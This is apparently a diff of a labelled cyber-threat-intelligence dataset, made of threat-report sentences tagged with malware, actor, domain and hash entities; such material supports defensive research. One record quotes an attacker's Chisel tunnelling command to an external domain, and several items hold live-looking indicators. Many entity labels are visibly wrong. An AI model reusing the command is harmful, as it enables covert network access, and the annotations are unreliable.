IoCs.","entities":[{"id":45933,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} -{"id":234,"text":" We monitored a list of 50 legitimate Ukraine-related domains (e.g., popular news and donation websites) and keywords (e.g., Ukraine, refugee) as targets for cybersquatting.","entities":[{"id":45781,"label":"location","start_offset":125,"end_offset":132},{"id":45934,"label":"location","start_offset":38,"end_offset":45},{"id":44651,"label":"attack-pattern","start_offset":158,"end_offset":172}],"relations":[{"id":137,"from_id":44651,"to_id":45781,"type":"targets"}],"Comments":[]} -{"id":235,"text":"We detected 11,637 cybersquatting newly registered domains (NRDs) during February and March.","entities":[{"id":45935,"label":"TIME","start_offset":73,"end_offset":81},{"id":45936,"label":"TIME","start_offset":86,"end_offset":91}],"relations":[],"Comments":[]} -{"id":236,"text":"In particular, we noticed a sharp increase in the number of cybersquatting domains that were registered close to Feb. 24, as shown in Figure 10 below.","entities":[{"id":45937,"label":"attack-pattern","start_offset":60,"end_offset":74},{"id":45938,"label":"TIME","start_offset":113,"end_offset":120}],"relations":[],"Comments":[]} -{"id":237,"text":" We manually analyzed a sample set of these cybersquatting domains.","entities":[{"id":45782,"label":"attack-pattern","start_offset":44,"end_offset":58}],"relations":[],"Comments":[]} -{"id":238,"text":"Below we share some interesting case studies.","entities":[],"relations":[],"Comments":[]} -{"id":240,"text":"A detailed analysis of these domains revealed that many of them are fake.","entities":[],"relations":[],"Comments":[]} -{"id":241,"text":"These donation websites provide little to no information about the associated organization and distribution of funds.","entities":[],"relations":[],"Comments":[]} -{"id":242,"text":"Many of these websites use cryptocurrency wallets (e.g., BTC, ETH) to accept payment (likely because these wallets are easy to set up and require no verification). We also find that some websites are mimicking popular donation websites or organizations to trick users into paying them money.","entities":[{"id":45940,"label":"SOFTWARE","start_offset":57,"end_offset":60},{"id":45941,"label":"SOFTWARE","start_offset":62,"end_offset":65}],"relations":[],"Comments":[]} -{"id":243,"text":"We show some examples in Figure 11.","entities":[],"relations":[],"Comments":[]} -{"id":244,"text":"For instance, donatetoukraine[.]com is pretending to be associated with the popular Come Back Alive campaign.","entities":[{"id":45942,"label":"DOMAIN","start_offset":14,"end_offset":35},{"id":45943,"label":"campaign","start_offset":84,"end_offset":108}],"relations":[{"id":138,"from_id":45942,"to_id":45943,"type":"related-to"}],"Comments":[]} -{"id":245,"text":"While the banking information shared on the donation website matches the original campaign website, we confirmed that the BTC wallet address is different from the actual.","entities":[{"id":45944,"label":"SOFTWARE","start_offset":122,"end_offset":132}],"relations":[],"Comments":[]} -{"id":246,"text":" We found a cybersquatting domain – save-russia[.]today – that is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44652,"label":"attack-pattern","start_offset":13,"end_offset":27},{"id":44653,"label":"DOMAIN","start_offset":37,"end_offset":56},{"id":44654,"label":"attack-pattern","start_offset":77,"end_offset":88},{"id":44655,"label":"identity","start_offset":92,"end_offset":112}],"relations":[{"id":8,"from_id":44653,"to_id":44655,"type":"targets"},{"id":112,"from_id":44652,"to_id":44653,"type":"uses"},{"id":113,"from_id":44654,"to_id":44653,"type":"uses"}],"Comments":[]} -{"id":247,"text":"Once a user opens the website in the browser, it starts making requests to various Ukrainian news sites and lists the number of requests made to each new site on the home page, as shown in Figure 12 below.","entities":[{"id":45945,"label":"identity","start_offset":83,"end_offset":103}],"relations":[],"Comments":[]} -{"id":248,"text":"Figure 12.","entities":[],"relations":[],"Comments":[]} -{"id":249,"text":"A cybersquatting domain save-russia[.]today is launching DoS attacks on Ukrainian news sites.","entities":[{"id":44656,"label":"attack-pattern","start_offset":2,"end_offset":16},{"id":44657,"label":"DOMAIN","start_offset":24,"end_offset":43},{"id":44658,"label":"attack-pattern","start_offset":57,"end_offset":68},{"id":44659,"label":"identity","start_offset":72,"end_offset":92}],"relations":[{"id":9,"from_id":44658,"to_id":44659,"type":"targets"},{"id":114,"from_id":44656,"to_id":44657,"type":"uses"},{"id":115,"from_id":44658,"to_id":44657,"type":"uses"}],"Comments":[]} -{"id":250,"text":"We strongly recommend that users be alert to the possibility of cybersquatting domains.","entities":[{"id":45946,"label":"attack-pattern","start_offset":64,"end_offset":78}],"relations":[],"Comments":[]} -{"id":251,"text":"In particular, fake donation websites mimicking popular websites can be misleading, as described earlier.","entities":[{"id":45948,"label":"attack-pattern","start_offset":38,"end_offset":64},{"id":45947,"label":"attack-pattern","start_offset":15,"end_offset":37}],"relations":[],"Comments":[]} -{"id":252,"text":"Before donating money, we recommend checking whether the website is referenced and shared by the official charity or government organization.","entities":[],"relations":[],"Comments":[]} -{"id":253,"text":"Our teams at Palo Alto Networks will continue monitoring domain squatting attacks and work to protect customers against them.","entities":[{"id":45949,"label":"identity","start_offset":13,"end_offset":31},{"id":45950,"label":"attack-pattern","start_offset":57,"end_offset":81}],"relations":[],"Comments":[]} -{"id":255,"text":" We detected campaigns of fake downloads where threat actors have set up web pages to host malicious binaries.","entities":[{"id":44660,"label":"attack-pattern","start_offset":26,"end_offset":40},{"id":44661,"label":"attack-pattern","start_offset":86,"end_offset":109}],"relations":[],"Comments":[]} -{"id":257,"text":"Most of these web pages show malicious binaries as popular browsers or communication apps in order to deceive users.","entities":[],"relations":[],"Comments":[]} -{"id":258,"text":"For example, we detected a website that was distributing a malicious binary by masquerading as a popular global communication app targeting users in Ukraine.","entities":[{"id":847,"label":"attack-pattern","start_offset":79,"end_offset":91},{"id":44662,"label":"location","start_offset":149,"end_offset":156},{"id":44663,"label":"attack-pattern","start_offset":44,"end_offset":75}],"relations":[],"Comments":[]} -{"id":260,"text":"Note that Palo Alto Networks customers receive protections against such domains from the Next-Generation Firewall via Advanced URL Filtering, DNS Security and WildFire URL Analysis subscriptions.","entities":[{"id":45955,"label":"SOFTWARE","start_offset":159,"end_offset":167},{"id":45954,"label":"identity","start_offset":10,"end_offset":28}],"relations":[],"Comments":[]} -{"id":261,"text":"We also found that these fake download campaigns rotate domains to distribute the same malicious binaries.","entities":[{"id":44664,"label":"attack-pattern","start_offset":25,"end_offset":38},{"id":44665,"label":"attack-pattern","start_offset":87,"end_offset":105}],"relations":[],"Comments":[]} -{"id":262,"text":"For example, we detected two domains distributing the same malicious binary where one domain was impersonating a popular, widely used video conferencing application and the other a widely used internet browser.","entities":[],"relations":[],"Comments":[]} -{"id":264,"text":"Our teams at Palo Alto Networks will continue to monitor and work to protect our customers against such attacks.","entities":[{"id":44666,"label":"identity","start_offset":13,"end_offset":31}],"relations":[],"Comments":[]} -{"id":267,"text":" Consistent with our previous reporting on the situation, Unit 42 continues to lead a company-wide effort to collect, evaluate and disseminate the latest intelligence on cyber activity related to Russia and Ukraine.","entities":[{"id":45785,"label":"identity","start_offset":58,"end_offset":65},{"id":45783,"label":"location","start_offset":196,"end_offset":202},{"id":45784,"label":"location","start_offset":207,"end_offset":214}],"relations":[],"Comments":[]} -{"id":268,"text":"We are actively collaborating with our partners in industry and governments to share our analysis and findings based on our global threat telemetry network.","entities":[],"relations":[],"Comments":[]} -{"id":269,"text":" These efforts have enabled us to make near-daily updates to our platform to ensure our customers have the best protection possible.","entities":[],"relations":[],"Comments":[]} -{"id":270,"text":"This includes blocking hundreds of domain names, IP addresses and URLs for our customers related to newly discovered attacks.","entities":[],"relations":[],"Comments":[]} -{"id":271,"text":"We’ve updated and added signatures to the WildFire analysis and Cortex XDR Prevent and Pro products to block newly discovered vulnerabilities and malware including HermeticWiper.","entities":[{"id":45961,"label":"SOFTWARE","start_offset":42,"end_offset":50},{"id":45960,"label":"malware","start_offset":164,"end_offset":177},{"id":45962,"label":"SOFTWARE","start_offset":64,"end_offset":90}],"relations":[],"Comments":[]} -{"id":272,"text":"Read more about Cortex XDR protections.","entities":[{"id":45963,"label":"SOFTWARE","start_offset":16,"end_offset":26}],"relations":[],"Comments":[]} -{"id":273,"text":"Our Threat Prevention and Web Application and API Security products added coverage for the OctoberCMS vulnerability exploited in the WhisperGate attacks, and we released an XSOAR Playbook to help organizations hunt for this threat.","entities":[{"id":906,"label":"malware","start_offset":133,"end_offset":144},{"id":44671,"label":"campaign","start_offset":133,"end_offset":152},{"id":44672,"label":"SOFTWARE","start_offset":173,"end_offset":178},{"id":44670,"label":"vulnerability","start_offset":91,"end_offset":115}],"relations":[{"id":10,"from_id":44671,"to_id":44670,"type":"delivers"}],"Comments":[]} -{"id":274,"text":"Cortex Xpanse can assist with understanding and managing your organization’s attack surface as well as identifying vulnerable resources.","entities":[{"id":45964,"label":"SOFTWARE","start_offset":0,"end_offset":13}],"relations":[],"Comments":[]} -{"id":275,"text":" We have released public reports on the WhisperGate attacks and the infrastructure and tactics used by the Gamaredon group.","entities":[{"id":45965,"label":"malware","start_offset":40,"end_offset":51},{"id":45966,"label":"threat-actor","start_offset":107,"end_offset":122}],"relations":[],"Comments":[]} -{"id":276,"text":"On the Unit 42 website, you will also find a free ATOM which contains a structured mapping of the Gamaredon group’s tactics aligned to MITRE’s ATT&CK framework.","entities":[{"id":44673,"label":"identity","start_offset":7,"end_offset":14},{"id":44674,"label":"threat-actor","start_offset":98,"end_offset":107},{"id":44675,"label":"SOFTWARE","start_offset":135,"end_offset":159},{"id":44676,"label":"SOFTWARE","start_offset":50,"end_offset":54}],"relations":[],"Comments":[]} -{"id":277,"text":" As the situation continues to develop, we’ll continue to update our blog with the latest information.","entities":[],"relations":[],"Comments":[]} -{"id":278,"text":" There is no single action you can take to protect your organization against this threat.","entities":[],"relations":[],"Comments":[]} -{"id":279,"text":"Unlike a new malware family or vulnerability in the wild, the attacks we expect could come in many forms.","entities":[],"relations":[],"Comments":[]} -{"id":280,"text":"Several western governments have proposed broad recommendations focused on technical hygiene.","entities":[{"id":45967,"label":"identity","start_offset":8,"end_offset":27}],"relations":[],"Comments":[]} -{"id":281,"text":"We consider these appropriate given the variety of tactics that Russian actors have used in the past.","entities":[{"id":45968,"label":"identity","start_offset":64,"end_offset":78}],"relations":[],"Comments":[]} -{"id":282,"text":" We recommend organizations prioritize actions in the following four areas: There is no way to know for certain what shape an attack may take, but taking these steps will help provide broad protection against what we expect to come.","entities":[],"relations":[],"Comments":[]} -{"id":283,"text":" Unit 42, the threat intelligence and security consulting arm of Palo Alto Networks, has a team of experts who can help your organization assess and test your security controls with proactive assessments and incident simulation services.","entities":[{"id":45970,"label":"identity","start_offset":1,"end_offset":8},{"id":45971,"label":"identity","start_offset":65,"end_offset":83}],"relations":[],"Comments":[]} -{"id":284,"text":"Because of the likelihood of ransomware attacks – or destructive attacks that pose as ransomware – it may be beneficial to focus on preparing in this area, particularly ensuring backup and recovery plans are in place.","entities":[],"relations":[],"Comments":[]} -{"id":285,"text":"We have distilled the knowledge we’ve gained from responding to hundreds of ransomware incidents into our Ransomware Readiness Assessment offering, which is designed to help organizations strengthen their processes and technology to mitigate threats like the ones we expect in the coming days and weeks.","entities":[],"relations":[],"Comments":[]} -{"id":286,"text":" If you think you may have been compromised by wiper attacks, Gamaredon, DDoS attacks or other cyber activity related to Russia-Ukraine, or have an urgent matter, get in touch with the Unit 42 Incident Response team or call North America Toll-Free: 866.486.4842 (866.4.UNIT42), EMEA: +31.20.299.3130, APAC: +65.6983.8730, or Japan: +81.50.1790.0200.","entities":[{"id":45972,"label":"threat-actor","start_offset":62,"end_offset":71},{"id":45975,"label":"location","start_offset":325,"end_offset":330},{"id":45976,"label":"location","start_offset":301,"end_offset":305},{"id":45979,"label":"identity","start_offset":185,"end_offset":215},{"id":45973,"label":"attack-pattern","start_offset":73,"end_offset":85},{"id":45974,"label":"location","start_offset":224,"end_offset":237},{"id":45977,"label":"location","start_offset":278,"end_offset":282},{"id":45980,"label":"attack-pattern","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} -{"id":287,"text":" Threat Brief: Ongoing Russia and Ukraine Cyber Conflict (Jan. 20) Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (Updated Feb. 16)","entities":[{"id":965,"label":"threat-actor","start_offset":76,"end_offset":85},{"id":966,"label":"threat-actor","start_offset":90,"end_offset":104},{"id":51805,"label":"TIME","start_offset":58,"end_offset":65},{"id":51806,"label":"TIME","start_offset":151,"end_offset":158},{"id":45982,"label":"location","start_offset":23,"end_offset":29},{"id":45983,"label":"location","start_offset":34,"end_offset":41},{"id":45981,"label":"location","start_offset":67,"end_offset":74}],"relations":[{"id":139,"from_id":965,"to_id":966,"type":"duplicate-of"},{"id":141,"from_id":966,"to_id":45981,"type":"originates-from"},{"id":140,"from_id":965,"to_id":45981,"type":"originates-from"}],"Comments":[]} -{"id":288,"text":"Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot Threat Briefing: Protecting Against Russia-Ukraine Cyber Activity Palo Alto Networks Resource Page: Protect Against Russia-Ukraine Cyber Activity Cortex XDR Protections Against Malware Associated with Ukraine and Russia Cyber Activity","entities":[{"id":970,"label":"attack-pattern","start_offset":0,"end_offset":14},{"id":974,"label":"malware","start_offset":94,"end_offset":102},{"id":976,"label":"malware","start_offset":122,"end_offset":130},{"id":977,"label":"location","start_offset":167,"end_offset":173},{"id":978,"label":"location","start_offset":174,"end_offset":181},{"id":979,"label":"identity","start_offset":197,"end_offset":215},{"id":981,"label":"location","start_offset":247,"end_offset":253},{"id":982,"label":"location","start_offset":254,"end_offset":261},{"id":983,"label":"tools","start_offset":277,"end_offset":287},{"id":44679,"label":"identity","start_offset":30,"end_offset":54},{"id":44678,"label":"location","start_offset":47,"end_offset":54},{"id":44685,"label":"location","start_offset":332,"end_offset":339},{"id":44686,"label":"location","start_offset":344,"end_offset":350}],"relations":[{"id":116,"from_id":970,"to_id":44679,"type":"targets"},{"id":118,"from_id":974,"to_id":970,"type":"uses"},{"id":119,"from_id":976,"to_id":970,"type":"uses"},{"id":117,"from_id":974,"to_id":44679,"type":"targets"}],"Comments":[]} +{"id":8989,"text":"First, the dlpprem32.dll file linked to HyperBro shares certain characteristics (specifically imphash, RICH header) with previous samples already attributed to the group.","entities":[{"id":27775,"label":"malware","start_offset":40,"end_offset":48},{"id":27776,"label":"location","start_offset":103,"end_offset":107}],"relations":[],"Comments":[]} +{"id":1298,"text":" The malware will copy itself to the %TEMP% directory with the executable name of 'notilv.exe'.","entities":[{"id":46663,"label":"FILEPATH","start_offset":37,"end_offset":43},{"id":46664,"label":"FILEPATH","start_offset":83,"end_offset":93}],"relations":[],"Comments":[]} +{"id":12600,"text":"The information we gathered indicates that this attack started hitting organizations in early May.","entities":[],"relations":[],"Comments":[]} +{"id":7552,"text":" Figure 1. TA505\u2019s latest infection chain","entities":[],"relations":[],"Comments":[]} +{"id":3740,"text":"-11:","entities":[],"relations":[],"Comments":[]} +{"id":13560,"text":"Analysis of the XSS attack","entities":[{"id":42282,"label":"attack-pattern","start_offset":16,"end_offset":19}],"relations":[],"Comments":[]} +{"id":6914,"text":"Last year, TAG discovered that a single threat actor was capitalizing on five zero-day vulnerabilities.","entities":[],"relations":[],"Comments":[]} +{"id":2040,"text":"As the threat actor would normally have a foothold into the network prior to ransomware deployment, it raises the question of why this backdoor is part of the ransomware execution.","entities":[],"relations":[],"Comments":[]} +{"id":12595,"text":" Delivery URLs Javascript Sandbox escape \/ LPE Backdoor C2 This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q3 2021.","entities":[],"relations":[],"Comments":[]} +{"id":14053,"text":"Even though this analysis was three years before Operation Earth Kitsune, the attackers appear to have reused the same TTPs for delivering the malware.","entities":[{"id":47206,"label":"campaign","start_offset":49,"end_offset":72}],"relations":[],"Comments":[]} +{"id":5958,"text":"We remain committed to updating the community as we uncover these campaigns.","entities":[{"id":18316,"label":"location","start_offset":36,"end_offset":45},{"id":18317,"label":"tools","start_offset":52,"end_offset":59}],"relations":[],"Comments":[]} +{"id":5398,"text":"Just like Pawn Storm, Sandworm is fishing with a wide net or looking to compromise assets on a larger scale.","entities":[{"id":51397,"label":"threat-actor","start_offset":10,"end_offset":20},{"id":51398,"label":"threat-actor","start_offset":22,"end_offset":30}],"relations":[],"Comments":[]} +{"id":14346,"text":"It was also under the guise of the previously mentioned adult game and still connects to the aforementioned C&C server.","entities":[],"relations":[],"Comments":[]} +{"id":13557,"text":"In at least one instance, a site that Water Pamola attacked later disclosed that they had suffered a data breach.","entities":[{"id":51635,"label":"campaign","start_offset":38,"end_offset":50}],"relations":[],"Comments":[]} +{"id":4152,"text":"This is used to build a connection between inter\/intranet via Chisel: C:\\WINDOWS\\system32\\ch.exe client https[:]\/\/webadmin[.]mirrorstorage[.]org:443 r:127.0.0.1:47586:socks Exfiltration","entities":[{"id":49964,"label":"URL","start_offset":105,"end_offset":149},{"id":49962,"label":"tools","start_offset":62,"end_offset":68},{"id":49963,"label":"FILEPATH","start_offset":71,"end_offset":97}],"relations":[],"Comments":[]} +{"id":7322,"text":"Domain history of mykessef[.]com based on Whois Lookup ","entities":[],"relations":[],"Comments":[]} +{"id":1642,"text":"Figure 5: Funtasy internal class structure.","entities":[],"relations":[],"Comments":[]} +{"id":6719,"text":"It was last updated on May 27, 2020.","entities":[],"relations":[],"Comments":[]} +{"id":9681,"text":"Each quadruple of bytes is XOR-ed with it, as shown in example below.","entities":[],"relations":[],"Comments":[]} +{"id":3561,"text":"The following image shows an assembly module property that was generated for this sample.","entities":[],"relations":[],"Comments":[]} +{"id":8564,"text":"The phishing kit will also ask for second-factor authentication codes sent to devices.","entities":[{"id":26462,"label":"attack-pattern","start_offset":4,"end_offset":12},{"id":26463,"label":"location","start_offset":17,"end_offset":21}],"relations":[],"Comments":[]} +{"id":3416,"text":"Silverlight_ins.exe ","entities":[{"id":49105,"label":"FILEPATH","start_offset":0,"end_offset":19}],"relations":[],"Comments":[]} +{"id":2148,"text":" We highly recommend following Microsoft\u2019s guidance to protect your enterprise until a patch is issued to fix the problem.","entities":[{"id":45402,"label":"identity","start_offset":31,"end_offset":40}],"relations":[],"Comments":[]} +{"id":1114,"text":"In other words, it\u2019s slow going.","entities":[],"relations":[],"Comments":[]} +{"id":3529,"text":"Figure 8.","entities":[],"relations":[],"Comments":[]} +{"id":6348,"text":" The flow of execution is the following: Roshan_CV.ISO\u2192Roshan-Bandar_CV_Dialog.LNK\u2192cmd.exe\u2192OneDriveUpdater.exe\u2192version.dll\u2192OneDrive.Update Decret.ISO\u2192Decret.LNK\u2192cmd.exe\u2192HPScan.exe\u2192version.dll\u2192HPScanApi.dll ","entities":[],"relations":[],"Comments":[]} +{"id":9249,"text":"image any machines until after a forensic scan has been done to ensure you\u2019ve preserved any IoCs.","entities":[],"relations":[],"Comments":[]} +{"id":6832,"text":"Last month, we sent 1,755 warnings to users whose accounts were targets of government-backed attackers.","entities":[],"relations":[],"Comments":[]} +{"id":2503,"text":"myshell.jsp","entities":[{"id":47670,"label":"FILEPATH","start_offset":0,"end_offset":11}],"relations":[],"Comments":[]} +{"id":7473,"text":"Dropped Files Visual Basic file and Powershell file; the VBS file executes the PS file","entities":[{"id":23273,"label":"location","start_offset":32,"end_offset":35},{"id":23274,"label":"attack-pattern","start_offset":36,"end_offset":46}],"relations":[],"Comments":[]} +{"id":13965,"text":" Tags APT & Targeted Attacks | Ransomware | Research | Articles, News, Reports","entities":[],"relations":[],"Comments":[]} +{"id":4875,"text":"As part of our efforts to combat serious threat actors, we use results of our research to improve the safety and security of our products.","entities":[],"relations":[],"Comments":[]} +{"id":361,"text":"While network-based defenses are not a substitute for patching software, Heartbleed is detectable using IPS signatures.","entities":[{"id":46056,"label":"vulnerability","start_offset":73,"end_offset":83}],"relations":[],"Comments":[]} +{"id":13484,"text":"We take steps to prevent possible future attempts by the same actors, and routinely exchange information and share our findings with others in the industry.","entities":[],"relations":[],"Comments":[]} +{"id":13971,"text":"While this strategy has provided a small level of success, it\u2019s not sustainable and definitely not an option for the remaining 90% of companies with resource challenges.","entities":[],"relations":[],"Comments":[]} +{"id":8051,"text":"We warn users when we suspect a government-backed threat like APT35 is targeting them.","entities":[{"id":24983,"label":"threat-actor","start_offset":62,"end_offset":67},{"id":24984,"label":"location","start_offset":81,"end_offset":85}],"relations":[],"Comments":[]} +{"id":6060,"text":"In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML (CVE-2021-40444).","entities":[{"id":18689,"label":"threat-actor","start_offset":114,"end_offset":125},{"id":18691,"label":"location","start_offset":175,"end_offset":180}],"relations":[],"Comments":[]} +{"id":7526,"text":"The message above can be decrypted to: {\"STATUS\": \"OK\", \"TOKEN\": \"d02153ffaf8137b1fa3bb852a27a12f8\"}","entities":[{"id":23390,"label":"location","start_offset":18,"end_offset":21},{"id":23391,"label":"MD5","start_offset":66,"end_offset":98}],"relations":[],"Comments":[]} +{"id":10876,"text":" June 8, 2020 be9214a5804632004f7fd5b90fbac3e23f44bb7f0a252b8277dd7e9d8b8a52f3 networktopologymaps[.]com Likely repacked from Snaptube, though It is not the same as 596257ef017b02ba6961869d78a2317500a45f00c76682a22bbdbd3391857b5d. June 8, 2020 a9378a5469319faffc48f3aa70f5b352d5acb7d361c5177a9aac90d9c58bb628 networktopologymaps[.]com Likely repacked from net[.]cybertik[.]wifi (the original app could be downloaded from the Yemeni website, cybertik[.]net).","entities":[{"id":33107,"label":"SHA2","start_offset":15,"end_offset":79},{"id":33108,"label":"location","start_offset":108,"end_offset":114},{"id":33109,"label":"location","start_offset":160,"end_offset":164},{"id":33110,"label":"SHA1","start_offset":168,"end_offset":232},{"id":33112,"label":"SHA2","start_offset":249,"end_offset":313},{"id":33113,"label":"location","start_offset":342,"end_offset":348}],"relations":[],"Comments":[]} +{"id":2432,"text":" The code snippet seen in Figure 6 shows the fix to CVE-2010-1622.","entities":[{"id":47500,"label":"vulnerability","start_offset":52,"end_offset":65}],"relations":[],"Comments":[]} +{"id":12468,"text":"We terminated 6 YouTube channels as part of our ongoing investigation into coordinated influence operations linked to Iran.","entities":[],"relations":[],"Comments":[]} +{"id":2572,"text":"To help customers take steps to better understand and protect against this threat, we\u2019ve posted information in our article PAN-OS Configuration Recommendations to Protect Against Shamoon 2 located in our Threat and Vulnerability Articles section on our Live Community.","entities":[{"id":47768,"label":"threat-actor","start_offset":179,"end_offset":188}],"relations":[],"Comments":[]} +{"id":285,"text":"We have distilled the knowledge we\u2019ve gained from responding to hundreds of ransomware incidents into our Ransomware Readiness Assessment offering, which is designed to help organizations strengthen their processes and technology to mitigate threats like the ones we expect in the coming days and weeks.","entities":[],"relations":[],"Comments":[]} +{"id":6358,"text":"The following is a snippet of code from version.dll that starts the execution of the in-memory decrypted payload.","entities":[],"relations":[],"Comments":[]} +{"id":10845,"text":"When this message is received, a periodic task for the \u201ccollect message\u201d handler is set.","entities":[],"relations":[],"Comments":[]} +{"id":1618,"text":" While the terms page is on the screen, in the background the Trojan checks to see if the phone is attached to a network with one of the following mobile network codes (MNC): Each of these networks is Spanish, except for a single Australian network.","entities":[],"relations":[],"Comments":[]} +{"id":4544,"text":"Google is committed to leading the industry in detecting and disrupting these threats.","entities":[{"id":50337,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":3663,"text":"We also separately discussed how Trend Micro solutions deal with these threats.","entities":[{"id":49444,"label":"identity","start_offset":33,"end_offset":44}],"relations":[],"Comments":[]} +{"id":6331,"text":" The file in VirusTotal named Roshan_CV.iso (SHA256: 1FC7B0E1054D54CE8F1DE0CC95976081C7A85C7926C03172A3DDAA672690042C) appears to be a curriculum vitae (similar to a resume) of an individual named Roshan.","entities":[{"id":19663,"label":"SHA2","start_offset":53,"end_offset":117}],"relations":[],"Comments":[]} +{"id":3685,"text":"Credentials of existing valid accounts were also abused.","entities":[],"relations":[],"Comments":[]} +{"id":2098,"text":"CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors.","entities":[{"id":47232,"label":"identity","start_offset":0,"end_offset":3}],"relations":[],"Comments":[]} +{"id":14325,"text":"The name of the Twitter account is Round Year Fun (hxxps:\/\/twitter[.]com\/RoundYear_Fun), and its homepage is full of tweets that promote games from hxxp:\/\/www[.]roundyearfun[.]org.","entities":[{"id":48550,"label":"URL","start_offset":51,"end_offset":86},{"id":48551,"label":"URL","start_offset":148,"end_offset":179}],"relations":[],"Comments":[]} +{"id":13829,"text":"The code is shown in Figure 12.","entities":[],"relations":[],"Comments":[]} +{"id":2463,"text":"In many cases, the webshell file names had .jsp extensions, which would allow for a successful exploitation to install a working webshell.","entities":[{"id":47536,"label":"attack-pattern","start_offset":129,"end_offset":137}],"relations":[],"Comments":[]} +{"id":2590,"text":" Although there are no public indicators of compromise (IoCs), and no tactics, techniques and procedures (TTPs) that are unique to Lapsus$ Group, here we will summarize what is known of this threat actor to better enable defenders in understanding and mitigating this threat.","entities":[{"id":47773,"label":"threat-actor","start_offset":131,"end_offset":138}],"relations":[],"Comments":[]} +{"id":1736,"text":"If the link is an email from someone you know, you can also contact them to find out if they meant to send it, and if it is safe to visit.","entities":[],"relations":[],"Comments":[]} +{"id":9992,"text":"Collect active directory information aio.exe","entities":[],"relations":[],"Comments":[]} +{"id":10657,"text":"Compared to Nginx, another widely used open-source web server, Apache had the greatest increase in vulnerabilities over the past five years \u2013 particularly high-risk ones.","entities":[{"id":32532,"label":"attack-pattern","start_offset":44,"end_offset":50},{"id":32533,"label":"location","start_offset":63,"end_offset":69}],"relations":[],"Comments":[]} +{"id":2420,"text":"However, the return object of the getCachedIntrospectionResults method includes a class object.","entities":[],"relations":[],"Comments":[]} +{"id":10318,"text":" Trojan.MSIL.OCEANMAP.A","entities":[],"relations":[],"Comments":[]} +{"id":6554,"text":"These samples led us to the discovery of additional C&C servers that provided us with more information than we initially expected.","entities":[],"relations":[],"Comments":[]} +{"id":4775,"text":"Google manages a vulnerability rewards program (VRP), rewarding researchers millions of dollars for their contributions in securing our devices and platforms.","entities":[{"id":50677,"label":"identity","start_offset":0,"end_offset":6}],"relations":[],"Comments":[]} +{"id":4889,"text":"In this blog, we share examples of the specific tactics, techniques and procedures (TTPs) used to lure victims, as well as some guidance on how users can further protect themselves.","entities":[],"relations":[],"Comments":[]} +{"id":2569,"text":"The power of their attack doesn\u2019t lie in the tools they use but in their ability to obtain and abuse legitimate credentials.","entities":[{"id":47766,"label":"attack-pattern","start_offset":84,"end_offset":123}],"relations":[],"Comments":[]} +{"id":12703,"text":"Full details of Glupteba\u2019s network protocol can be found in this report from 2020, the following Python script illustrates how one can decrypt an encrypted domain name:","entities":[{"id":39436,"label":"malware","start_offset":16,"end_offset":24},{"id":39437,"label":"location","start_offset":44,"end_offset":47},{"id":39439,"label":"location","start_offset":127,"end_offset":130},{"id":39440,"label":"location","start_offset":131,"end_offset":134}],"relations":[],"Comments":[]} +{"id":3567,"text":"A closer look at ConfuserEx\u2019s functions","entities":[{"id":49351,"label":"tools","start_offset":17,"end_offset":27}],"relations":[],"Comments":[]} +{"id":11329,"text":"A new form is displayed if the information is not provided via command prompt.","entities":[],"relations":[],"Comments":[]} +{"id":12288,"text":"We received leads from Facebook that supported us in this investigation.","entities":[],"relations":[],"Comments":[]} +{"id":3996,"text":" Tags Latest News | Cloud | APT & Targeted Attacks | Network | Articles, News, Reports | Cyber Threats","entities":[],"relations":[],"Comments":[]} +{"id":1095,"text":"The worst case, for you, is that both you and IE read the file at the same time but you write your edits first.","entities":[{"id":46566,"label":"SOFTWARE","start_offset":46,"end_offset":48}],"relations":[],"Comments":[]} +{"id":1532,"text":" This vulnerability only affects Windows DNS and the following builds of the Microsoft Windows operating system (OS): ","entities":[{"id":46795,"label":"SOFTWARE","start_offset":33,"end_offset":44},{"id":46796,"label":"SOFTWARE","start_offset":77,"end_offset":116}],"relations":[],"Comments":[]} +{"id":10609,"text":"We use the intelligence we gather to protect Google infrastructure as well as users targeted with malware or phishing.","entities":[{"id":32363,"label":"attack-pattern","start_offset":109,"end_offset":117}],"relations":[],"Comments":[]} +{"id":4396,"text":"Host: {C2}","entities":[],"relations":[],"Comments":[]} +{"id":3001,"text":"In nearly all cases, good security around home routers and Wi-Fi will be the best thing you can do for the devices.","entities":[],"relations":[],"Comments":[]} +{"id":8550,"text":"Related Malware hashes: Top Phishing Domains:","entities":[{"id":26414,"label":"attack-pattern","start_offset":28,"end_offset":36}],"relations":[],"Comments":[]} +{"id":10168,"text":"As we have mentioned in our overview paper on Pawn Storm, other actors may also start their own campaigns that aim to influence politics and issues of interest domestically and abroad.","entities":[{"id":31029,"label":"threat-actor","start_offset":46,"end_offset":56},{"id":31030,"label":"location","start_offset":71,"end_offset":74},{"id":31031,"label":"location","start_offset":80,"end_offset":85},{"id":31032,"label":"location","start_offset":137,"end_offset":140},{"id":31033,"label":"location","start_offset":173,"end_offset":176}],"relations":[],"Comments":[]} +{"id":5098,"text":"These safeguards included: Although we recovered a Chrome RCE, we also found evidence where the attackers specifically checked for visitors using Safari on MacOS or Firefox (on any OS), and directed them to specific links on known exploitation servers.","entities":[{"id":51202,"label":"attack-pattern","start_offset":58,"end_offset":61},{"id":51201,"label":"SOFTWARE","start_offset":51,"end_offset":57},{"id":51203,"label":"SOFTWARE","start_offset":146,"end_offset":152},{"id":51204,"label":"SOFTWARE","start_offset":156,"end_offset":161},{"id":51205,"label":"SOFTWARE","start_offset":165,"end_offset":172}],"relations":[],"Comments":[]} +{"id":5325,"text":"The C&C server must have the corresponding RSA private key to decrypt the data.","entities":[],"relations":[],"Comments":[]} +{"id":13464,"text":"While we are actively monitoring activity related to Ukraine and Russia, we continue to be just as vigilant in relation to other threat actors globally, to ensure that they do not take advantage of everyone\u2019s focus on this 